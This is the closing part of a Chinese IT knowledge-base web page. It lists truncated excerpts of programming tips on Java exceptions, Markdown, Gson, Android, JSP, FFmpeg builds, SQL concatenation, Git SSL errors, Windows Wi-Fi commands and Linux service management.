1)ConcurrentModificationException 当你用for each遍历一个list时,如果你在循环主体代码中修改list中的元素,将会得到这个Exception,解决的办法是: 1)用listIterator, 它支持在遍历的过程中修改元素, 2)不用listIterator, new一个</div> </li> <li><a href="/article/2724.htm" title="1分钟学会Markdown语法" target="_blank">1分钟学会Markdown语法</a> <span class="text-muted">dcj3sjt126com</span> <a class="tag" taget="_blank" href="/search/markdown/1.htm">markdown</a> <div>markdown 简明语法 基本符号 *,-,+ 3个符号效果都一样,这3个符号被称为 Markdown符号 空白行表示另起一个段落 `是表示inline代码,tab是用来标记 代码段,分别对应html的code,pre标签 换行 单一段落( <p>) 用一个空白行 连续两个空格 会变成一个 <br> 连续3个符号,然后是空行</div> </li> <li><a href="/article/2851.htm" title="Gson使用二(GsonBuilder)" target="_blank">Gson使用二(GsonBuilder)</a> <span class="text-muted">eksliang</span> <a class="tag" taget="_blank" href="/search/json/1.htm">json</a><a class="tag" taget="_blank" href="/search/gson/1.htm">gson</a><a class="tag" taget="_blank" href="/search/GsonBuilder/1.htm">GsonBuilder</a> <div>转载请出自出处:http://eksliang.iteye.com/blog/2175473 一.概述     GsonBuilder用来定制java跟json之间的转换格式   二.基本使用 实体测试类: 温馨提示:默认情况下@Expose注解是不起作用的,除非你用GsonBuilder创建Gson的时候调用了GsonBuilder.excludeField</div> </li> <li><a href="/article/2978.htm" title="报ClassNotFoundException: Didn't find class "...Activity" on path: DexPathList" target="_blank">报ClassNotFoundException: Didn't find class "...Activity" on path: DexPathList</a> <span class="text-muted">gundumw100</span> <a class="tag" taget="_blank" href="/search/android/1.htm">android</a> <div>有一个工程,本来运行是正常的,我想把它移植到另一台PC上,结果报: java.lang.RuntimeException: Unable to instantiate activity ComponentInfo{com.mobovip.bgr/com.mobovip.bgr.MainActivity}: java.lang.ClassNotFoundException: Didn't f</div> </li> <li><a href="/article/3105.htm" title="JavaWeb之JSP指令" target="_blank">JavaWeb之JSP指令</a> <span class="text-muted">ihuning</span> <a class="tag" taget="_blank" href="/search/javaweb/1.htm">javaweb</a> <div>  要点   JSP指令简介  page指令  include指令    JSP指令简介    JSP指令(directive)是为JSP引擎而设计的,它们并不直接产生任何可见输出,而只是告诉引擎如何处理JSP页面中的其余部分。 JSP指令的基本语法格式: <%@ 指令 属性名="</div> </li> <li><a href="/article/3232.htm" title="mac上编译FFmpeg跑ios" target="_blank">mac上编译FFmpeg跑ios</a> <span class="text-muted">啸笑天</span> <a class="tag" taget="_blank" href="/search/ffmpeg/1.htm">ffmpeg</a> <div>1、下载文件:https://github.com/libav/gas-preprocessor, 复制gas-preprocessor.pl到/usr/local/bin/下, 修改文件权限:chmod 777 /usr/local/bin/gas-preprocessor.pl 2、安装yasm-1.2.0 curl http://www.tortall.net/projects/yasm</div> </li> <li><a href="/article/3359.htm" title="sql mysql oracle中字符串连接" target="_blank">sql mysql oracle中字符串连接</a> <span class="text-muted">macroli</span> <a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a><a class="tag" taget="_blank" href="/search/SQL+Server/1.htm">SQL Server</a> <div>有的时候,我们有需要将由不同栏位获得的资料串连在一起。每一种资料库都有提供方法来达到这个目的: MySQL: CONCAT() Oracle: CONCAT(), || SQL Server: + CONCAT() 的语法如下: Mysql 中 CONCAT(字串1, 字串2, 字串3, ...): 将字串1、字串2、字串3,等字串连在一起。 请注意,Oracle的CON</div> </li> <li><a href="/article/3486.htm" title="Git fatal: unab SSL certificate problem: unable to get local issuer ce rtificate" target="_blank">Git fatal: unab SSL certificate problem: unable to get local issuer ce rtificate</a> <span class="text-muted">qiaolevip</span> <a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0%E6%B0%B8%E6%97%A0%E6%AD%A2%E5%A2%83/1.htm">学习永无止境</a><a class="tag" taget="_blank" href="/search/%E6%AF%8F%E5%A4%A9%E8%BF%9B%E6%AD%A5%E4%B8%80%E7%82%B9%E7%82%B9/1.htm">每天进步一点点</a><a class="tag" taget="_blank" href="/search/git/1.htm">git</a><a class="tag" taget="_blank" href="/search/%E7%BA%B5%E8%A7%82%E5%8D%83%E8%B1%A1/1.htm">纵观千象</a> <div>// 报错如下: $ git pull origin master fatal: unable to access 'https://git.xxx.com/': SSL certificate problem: unable to get local issuer ce rtificate   // 原因: 由于git最新版默认使用ssl安全验证,但是我们是使用的git未设</div> </li> <li><a href="/article/3613.htm" title="windows命令行设置wifi" target="_blank">windows命令行设置wifi</a> <span class="text-muted">surfingll</span> <a class="tag" taget="_blank" href="/search/windows/1.htm">windows</a><a class="tag" taget="_blank" href="/search/wifi/1.htm">wifi</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0%E6%9C%ACwifi/1.htm">笔记本wifi</a> <div>还没有讨厌无线wifi的无尽广告么,还在耐心等待它慢慢启动么 教你命令行设置 笔记本电脑wifi: 1、开启wifi命令 netsh wlan set hostednetwork mode=allow ssid=surf8 key=bb123456 netsh wlan start hostednetwork pause 其中pause是等待输入,可以去掉 2、</div> </li> <li><a href="/article/3740.htm" title="Linux(Ubuntu)下安装sysv-rc-conf" target="_blank">Linux(Ubuntu)下安装sysv-rc-conf</a> <span class="text-muted">wmlJava</span> <a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/ubuntu/1.htm">ubuntu</a><a class="tag" taget="_blank" href="/search/sysv-rc-conf/1.htm">sysv-rc-conf</a> <div>安装:sudo apt-get install sysv-rc-conf 使用:sudo sysv-rc-conf 操作界面十分简洁,你可以用鼠标点击,也可以用键盘方向键定位,用空格键选择,用Ctrl+N翻下一页,用Ctrl+P翻上一页,用Q退出。     背景知识 sysv-rc-conf是一个强大的服务管理程序,群众的意见是sysv-rc-conf比chkconf</div> </li> <li><a href="/article/3867.htm" title="svn切换环境,重发布应用多了javaee标签前缀" target="_blank">svn切换环境,重发布应用多了javaee标签前缀</a> <span class="text-muted">zengshaotao</span> <a class="tag" taget="_blank" href="/search/javaee/1.htm">javaee</a> <div>更换了开发环境,从杭州,改变到了上海。svn的地址肯定要切换的,切换之前需要将原svn自带的.svn文件信息删除,可手动删除,也可通过废弃原来的svn位置提示删除.svn时删除。   然后就是按照最新的svn地址和规范建立相关的目录信息,再将原来的纯代码信息上传到新的环境。然后再重新检出,这样每次修改后就可以看到哪些文件被修改过,这对于增量发布的规范特别有用。   检出</div> </li> </ul> </div> </div> </div> <div> <div class="container"> <div class="indexes"> <strong>按字母分类:</strong> <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a> </div> </div> </div> <footer id="footer" class="mb30 mt30"> <div class="container"> <div class="footBglm"> <a target="_blank" href="/">首页</a> - <a target="_blank" href="/custom/about.htm">关于我们</a> - <a target="_blank" href="/search/Java/1.htm">站内搜索</a> - <a target="_blank" href="/sitemap.txt">Sitemap</a> - <a target="_blank" href="/custom/delete.htm">侵权投诉</a> </div> <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved. <!-- <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>--> </div> </div> </footer> <!-- 代码高亮 --> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script> <link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/> <script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script> </body> </html>